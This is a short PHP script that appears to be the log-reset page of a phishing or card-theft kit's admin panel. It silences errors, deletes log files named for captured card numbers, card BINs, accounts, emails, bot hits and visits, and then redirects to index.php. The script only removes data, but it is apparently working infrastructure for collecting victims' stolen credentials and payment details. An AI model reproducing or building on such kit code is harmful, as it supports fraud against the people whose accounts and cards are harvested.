<?php
error_reporting(0);
session_start();
unlink("../arahmataAngin/system/stats/log_robot.txt");
unlink("../arahmataAngin/system/stats/log_visit.txt");
unlink("../arahmataAngin/system/stats/log_account.txt");
unlink("../arahmataAngin/system/stats/log_email.txt");
unlink("../arahmataAngin/system/stats/log_cc.txt");
unlink("../arahmataAngin/system/stats/log_bin.txt");

// if (!file_exists('../arahmataAngin/system/stats/log_robot.txt')) {
    // touch('../arahmataAngin/system/stats/log_robot.txt');
// }
// if (!file_exists('../arahmataAngin/system/stats/log_visit.txt')) {
    // touch('../arahmataAngin/system/stats/log_visit.txt');
// }
// if (!file_exists('../arahmataAngin/system/stats/log_account.txt')) {
    // touch('../arahmataAngin/system/stats/log_account.txt');
// }
// if (!file_exists('../arahmataAngin/system/stats/log_email.txt')) {
    // touch('../arahmataAngin/system/stats/log_email.txt');
// }
// if (!file_exists('../arahmataAngin/system/stats/log_cc.txt')) {
    // touch('../arahmataAngin/system/stats/log_cc.txt');
// }
// if (!file_exists('../arahmataAngin/system/stats/log_bin.txt')) {
    // touch('../arahmataAngin/system/stats/log_bin.txt');
// }

echo "<script type='text/javascript'>window.top.location='index.php';</script>";
?>